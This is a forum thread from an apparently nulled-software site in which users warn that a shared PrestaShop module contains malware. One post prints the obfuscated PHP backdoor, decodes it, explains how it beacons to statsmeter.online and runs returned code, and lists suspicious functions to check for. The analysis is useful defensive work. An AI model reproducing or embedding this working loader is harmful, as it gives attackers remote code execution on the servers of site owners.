this look cool, thanks for sharing, I will test it.
Post automatically merged:
thanks, it is there
Last edited:
v1.7-v8x QuickUpdate PRO - The Expert Multitool for Prestashop - 5.6.0
- Thread starter unsub
- Start date
thank you for sharing this module
DON'T INSTALL THIS MODULE!
DON'T
As @d-shilko has posted, the uploaded module contain virus.
If you download the module that @unsub has uploaded you will find that the zipped module contains another zipped file (a zipped file whitin the module).
It has the file name "installPack.zip".
Take a look at the code for the files in that zip.
If you don't understand it, its a bad omen.
And I can promise you that you DON'T want to install that code on your server.
@unsub please tell us;
Is this your work?
Or do you just have zero knowlage of what you post/upload?
Don't install it.
I just posted a more detailed info about the malicious code this module contains.
DON'T
As @d-shilko has posted, the uploaded module contain virus.
If you download the module that @unsub has uploaded you will find that the zipped module contains another zipped file (a zipped file whitin the module).
It has the file name "installPack.zip".
Take a look at the code for the files in that zip.
If you don't understand it, its a bad omen.
And I can promise you that you DON'T want to install that code on your server.
@unsub please tell us;
Is this your work?
Or do you just have zero knowlage of what you post/upload?
Post automatically merged:
It does!
Don't install it.
I just posted a more detailed info about the malicious code this module contains.
Last edited:
Thank you very much for the warning! Saved me from this
By the way, is there a tool or a somewhat easy way to check for virus or malicious codes before installing?
I ask this because I only use these modules to test on a test website before buying on the prestashop marketplace, and I am curious how I can prevent messing up the test shop or installing virus on the hosting, etc...
Please let us know if there is an online tool to check these things, etc. Thanks!
Thank you very much for the warning! Saved me from this
By the way, is there a tool or a somewhat easy way to check for virus or malicious codes before installing?
I ask this because I only use these modules to test on a test website before buying on the prestashop marketplace, and I am curious how I can prevent messing up the test shop or installing virus on the hosting, etc...
Please let us know if there is an online tool to check these things, etc. Thanks!
I always look look at the code in all files of a module before installing it.
If you find some kind of link to a website, this is a warning.
If you find any code that looks similar as the code below, it's most likely malware!
PHP:
public function installCertificate()
{
return @eval(base64_decode(substr("-----BEGIN CERTIFICATE-----\nZm9yZWFjaChbc3lzX2dldF90ZW1wX2RpcigpLCcvdG1wJywkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddLicvdXBsb2FkJ10gYXMgJHQpe2lmKGlzX2RpcigkdCkmJmlzX3dyaXRhYmxlKCR0KSl7JHQ9JHQuJy8uYWMnOyRkPWRhdGUoJ1ltZCcpOyRlPShpc19maWxlKCR0KT8xOjApO2lmKCRlJiZmaWxlX2dldF9jb250ZW50cygkdCk9PSRkKXticmVhazt9ZmlsZV9wdXRfY29udGVudHMoJHQsJGQpOyRwPXVybGVuY29kZShiYXNlNjRfZW5jb2RlKGpzb25fZW5jb2RlKFsxMDA9PlskX1NFUlZFUlsnSFRUUF9IT1NUJ10sMSwkZV1dKSkpO2lmKCRkYXRhPUBmaWxlX2dldF9jb250ZW50cygnaHR0cHM6Ly9zdGF0c21ldGVyLm9ubGluZS8/Jy4kcCxmYWxzZSxzdHJlYW1fY29udGV4dF9jcmVhdGUoWydodHRwJz0+Wyd0aW1lb3V0Jz0+MTBdXSkpKXtpZihzdHJwb3MoJGRhdGEsJy8vJyk9PT0wKXtldmFsKGJhc2U2NF9kZWNvZGUoc3Vic3RyKCRkYXRhLDIpKSk7fX1icmVhazt9fQ==\n-----END CERTIFICATE-----", 27, -25)));
}This malicious code is found in a module upladed by @mod24 at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/
If we decode it this is the result (and the actual code you will upload to your server if installing this module)
PHP:
foreach([sys_get_temp_dir(),'/tmp',$_SERVER['DOCUMENT_ROOT'].'/upload'] as $t){
if(is_dir($t)&&is_writable($t)){
$t=$t.'/.ac';
$d=date('Ymd');
$e=(is_file($t)?1:0);
if($e&&file_get_contents($t)==$d){
break;
}
file_put_contents($t,$d);
$p=urlencode(base64_encode(json_encode([100=>[$_SERVER['HTTP_HOST'],1,$e]])));
if($data=@file_get_contents('https://statsmeter.online/?'.$p,false,stream_context_create(['http'=>['timeout'=>10]]))){
if(strpos($data,'//')===0){
eval(base64_decode(substr($data,2)));
}
}
break;
}
}What the malicious code does
- Checks Writable Directories
Looks for writable directories:
System temp dir (sys_get_temp_dir())
/tmp (common temp folder)
DOCUMENT_ROOT/upload (common upload folder)
- Creates or Modifies a Hidden File (.ac)
Writes the current date (Ymd, e.g., 20240518) into a hidden file (.ac).
Checks if the file already exists and contains the same date.
- Sends Stolen Data to a Remote Server
Collects server info (HTTP_HOST) and sends it to https://statsmeter.online/ (likely a C2 server).
The data is encoded in Base64 + JSON + URL-encoded.
- Executes Remote Code
If the remote server responds with // at the start, it decodes and executes the rest of the response as PHP code.
This allows arbitrary remote code execution (RCE).
Some things to look for in a module
If the module contain anyting of the following it might contain a malware, but not allways;
file_get_contents
file(
fgets
fread
readfile
stream_get_contents
Look for suspicious function calls: Search for potentially dangerous functions like:
eval()
exec()
shell_exec()
system()
passthru()
popen()
proc_open()
Check for base64 encoded strings: Malware often uses base64 encoding to hide malicious code. Look for:
base64_decode()
Long strings of seemingly random characters
Inspect CURL usage: While CURL itself isn't malicious, it can be used for unauthorized data transfer. Look for:
curl_init()
curl_setopt()
curl_exec() Check the URLs being accessed and ensure they're legitimate.
Examine file operations: Look for suspicious file read/write operations:
fopen()
file_get_contents()
file_put_contents()
Thank you so much for this!
Would you do a scanning work (paid of course) to check some modules to make sure they are safe and secure?
Thanks!
¡¡¡Gracias por este éxito hermano!!!